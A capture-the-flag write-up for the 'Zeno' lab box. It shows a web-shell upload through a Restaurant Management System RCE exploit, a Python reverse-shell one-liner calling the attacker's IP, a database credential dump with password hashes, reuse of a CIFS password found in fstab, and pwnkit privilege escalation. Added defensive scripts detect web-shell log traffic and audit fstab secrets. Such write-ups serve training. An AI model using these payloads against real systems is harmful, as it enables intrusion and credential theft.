CTF : Zeno
Information
- IP: 10.10.205.120
- MYIP: 10.9.85.5
First enumeration
Basics
- NMAP
```console
$ sudo nmap -p22,12340 -A 10.10.205.120
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-25 22:26 CEST
Nmap scan report for 10.10.205.120
Host is up (0.040s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 09:23:62:a2:18:62:83:69:04:40:62:32:97:ff:3c:cd (RSA)
|   256 33:66:35:36:b0:68:06:32:c1:8a:f6:01:bc:43:38:ce (ECDSA)
|_  256 14:98:e3:84:70:55:e6:60:0c:c2:09:77:f8:b7:a6:1c (ED25519)
12340/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: We've got some trouble | 404 - Resource not found
| http-methods:
|_  Potentially risky methods: TRACE
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (90%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Adtran 424RG FTTH gateway (86%), Linux 2.6.32 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   37.96 ms 10.9.0.1
2   38.40 ms 10.10.205.120

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.41 seconds
```
Vulnerabilities search
I started by exploring what we can find on HTTP port 12340:
```console
$ dirsearch -u http://10.10.205.120:12340 -w /usr/share/seclists/Discovery/Web-Content/big.txt

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 20476

Output File: /home/boula/.dirsearch/reports/10.10.205.120-12340/_22-07-25_22-46-39.txt

Error Log: /home/boula/.dirsearch/logs/errors-22-07-25_22-46-39.log

Target: http://10.10.205.120:12340/

[22:46:39] Starting:
[22:47:29] 301 -  239B  - /rms  ->  http://10.10.205.120:12340/rms/

Task Completed
```
There is an rms subdirectory, which turns out to host a Restaurant Management System. Let's see whether a known exploit exists for it...
```console
$ searchsploit restaurant management system
------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                       |  Path
------------------------------------------------------------------------------------- ---------------------------------
Restaurant Management System 1.0 - Remote Code Execution                             | php/webapps/47520.py
------------------------------------------------------------------------------------- ---------------------------------
```
Exploit
I had to modify the script, but after that:
```console
$ python2 47520.py http://10.10.205.120:12340/rms/

Credits : All InfoSec (Raja Ji's) Group

[+] Restaurant Management System Exploit, Uploading Shell
[+] Shell Uploaded. Please check the URL : http://10.10.205.120:12340/rms/images/reverse-shell.php
```
And now we can send commands :
```console
$ curl 'http://10.10.205.120:12340/rms/images/reverse-shell.php?cmd=id'
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
```
So first I launched a pwncat on my box :
```shell
pwncat -lp 1234
```
Then :
```console
http://10.10.205.120:12340/rms/images/reverse-shell.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.85.5",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
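From the defender's side, the whole chain above leaves an obvious trace in the Apache access log: a `.php` file being requested from an image upload directory, with a command-style query parameter. The following detection script is an added example (not part of the original writeup); the log lines are constructed samples modelled on the requests shown above, and the `/rms/admin/index.php` path is a placeholder.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache "combined" log format, enough fields to get client, request and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# Directories meant for static uploads; a server-side script living there is a red flag.
UPLOAD_DIRS = ("/images/", "/uploads/", "/upload/", "/files/")
EXEC_EXT = (".php", ".phtml", ".php5", ".phar")
CMD_PARAMS = {"cmd", "exec", "command", "run"}

def classify(line):
    """Return the reasons a log line looks like web-shell traffic (empty if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group("url"))
    path = parts.path.lower()
    reasons = []
    if any(d in path for d in UPLOAD_DIRS) and path.endswith(EXEC_EXT):
        reasons.append("script executed from upload directory")
    if CMD_PARAMS & set(parse_qs(parts.query)):
        reasons.append("command-style query parameter")
    return reasons

def find_suspicious(lines):
    """Return (client_ip, path, reasons) for every suspicious line."""
    hits = []
    for line in lines:
        reasons = classify(line)
        if reasons:
            m = LOG_RE.match(line)
            hits.append((m.group("ip"), urlsplit(m.group("url")).path, reasons))
    return hits

# Constructed sample access-log lines (not real traffic from the box).
SAMPLE_LOG = [
    '10.9.85.5 - - [25/Jul/2022:22:50:01 +0200] "GET /rms/index.php HTTP/1.1" 200 5120',
    '10.9.85.5 - - [25/Jul/2022:22:51:13 +0200] "POST /rms/admin/index.php HTTP/1.1" 302 0',
    '10.9.85.5 - - [25/Jul/2022:22:52:40 +0200] "GET /rms/images/reverse-shell.php?cmd=id HTTP/1.1" 200 98',
    '10.9.85.5 - - [25/Jul/2022:22:53:02 +0200] "GET /rms/images/logo.png HTTP/1.1" 200 4321',
]

if __name__ == "__main__":
    for ip, path, reasons in find_suspicious(SAMPLE_LOG):
        print(f"{ip} {path}: {'; '.join(reasons)}")
```

The same two conditions translate directly into a mod_security or SIEM rule; blocking script execution in upload directories at the web-server level closes the hole regardless of the application bug.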
Privilege escalation
Enumeration for privesc
```console
$ cat /var/www/html/rms/connection/config.php
<?php
define('DB_HOST', 'localhost');
define('DB_USER', 'root');
define('DB_PASSWORD', '-------------');
define('DB_DATABASE', 'dbrms');
define('APP_NAME', 'Pathfinder Hotel');
error_reporting(1);
?>
```
With these credentials I connected to MySQL and looked at the members table:
```console
select * from members;
+-----------+-----------+----------+--------------------------+----------------------------------+-------------+----------------------------------+
| member_id | firstname | lastname | login                    | passwd                           | question_id | answer                           |
+-----------+-----------+----------+--------------------------+----------------------------------+-------------+----------------------------------+
|        15 | Stephen   | Omolewa  | omolewastephen@gmail.com | 81dc9bdb52d04dc20036dbd8313ed055 |           9 | 51977f38bb3afdf634dd8162c7a33691 |
|        16 | John      | Smith    | jsmith@sample.com        | 1254737c076cf867dc53d60a0364f38e |           8 | 9f2780ee8346cc83b212ff038fcdb45a |
|        17 | edward    | zeno     | edward@zeno.com          | 6f72ea079fd65aff33a67a3f3618b89c |           8 | 6f72ea079fd65aff33a67a3f3618b89c |
|        18 | Toto      | Titi     | toto@toto.com            | 3d09baddc21a365b7da5ae4d0aa5cb95 |           9 | 5844a15e76563fedd11840fd6f40ea7b |
+-----------+-----------+----------+--------------------------+----------------------------------+-------------+----------------------------------+
4 rows in set (0.00 sec)
```
But I didn't manage to crack edward's hash...
So I decided to search for readable elements owned by edward :
```console
$ find / -user edward -readable 2>/dev/null
/mnt/secret-share
```
This directory is empty, but it is a mount point, so let's look at /etc/fstab:
```console
$ cat /etc/fstab

#
# /etc/fstab
# Created by anaconda on Tue Jun 8 23:56:31 2021
#
# Accessible filesystems, by reference, are maintained under '/dev/disk'
# See man pages fstab(5), findfs(8), mount(8) and/or blkid(8) for more info
#
/dev/mapper/centos-root /                       xfs     defaults        0 0
UUID=507d63a9-d8cc-401c-a660-bd57acfd41b2 /boot                   xfs     defaults        0 0
/dev/mapper/centos-swap swap                    swap    defaults        0 0
#//10.10.10.10/secret-share /mnt/secret-share cifs _netdev,vers=3.0,ro,username=zeno,password=-----------,domain=localdomain,soft 0 0
```
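The weakness here is a CIFS password embedded in the mount options of a world-readable file; commenting the entry out does not help, the secret is still on disk. The following audit script is an added example (not from the writeup) that parses fstab entries, including disabled ones, and reports every option carrying a password; the sample fstab is constructed from the entry above with a placeholder in place of the real password.

```python
import os
import stat

SECRET_KEYS = ("password", "pass", "passwd")
DEVICE_PREFIXES = ("/", "UUID=", "LABEL=", "PARTUUID=")

def parse_fstab(text):
    """Yield (active, device, mountpoint, fstype, options) for each entry.
    Commented-out entries are kept with active=False: they leak all the same."""
    for raw in text.splitlines():
        line = raw.strip()
        active = not line.startswith("#")
        fields = line.lstrip("#").split()
        # Skip blank lines and ordinary comments that are not disabled entries.
        if len(fields) < 4 or not fields[0].startswith(DEVICE_PREFIXES):
            continue
        yield active, fields[0], fields[1], fields[2], fields[3].split(",")

def find_embedded_secrets(text):
    """Return (mountpoint, fstype, option_name, active) for every secret-bearing option."""
    findings = []
    for active, _dev, mnt, fstype, opts in parse_fstab(text):
        for opt in opts:
            key = opt.split("=", 1)[0].lower()
            if key in SECRET_KEYS:
                findings.append((mnt, fstype, key, active))
    return findings

def world_readable(path="/etc/fstab"):
    """True when 'other' can read the file, which is the usual default for fstab."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)

# Constructed sample modelled on the entry found on the box; the password is a placeholder.
SAMPLE_FSTAB = """\
# /etc/fstab
# See man pages fstab(5), findfs(8), mount(8) and/or blkid(8) for more info
/dev/mapper/centos-root /       xfs     defaults        0 0
UUID=507d63a9-d8cc-401c-a660-bd57acfd41b2 /boot xfs defaults 0 0
/dev/mapper/centos-swap swap    swap    defaults        0 0
#//10.10.10.10/secret-share /mnt/secret-share cifs _netdev,vers=3.0,ro,username=zeno,password=PLACEHOLDER,domain=localdomain,soft 0 0
"""

if __name__ == "__main__":
    for mnt, fstype, key, active in find_embedded_secrets(SAMPLE_FSTAB):
        state = "active" if active else "commented-out"
        print(f"{mnt} ({fstype}): '{key}=' in mount options [{state}]; "
              "move it to a root-only credentials= file instead")
```

The fix for cifs mounts is the `credentials=/path/to/file` option with the file mode 0600 and owned by root, and a password that is not shared with any local account.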
The CIFS password for zeno also works for the edward account, so now I can su to edward and read user.txt :)
Exploit
This box is quite old (CentOS with Apache 2.4.6 and PHP 5.4.16), so I chose to test pwnkit (CVE-2021-4034)... and it works :)
```console
$ python CVE-2021-4034.py
[+] Creating shared library for exploit code.
[+] Calling execve()
[root@zeno tmp]# cat /root/root.txt
```
\o/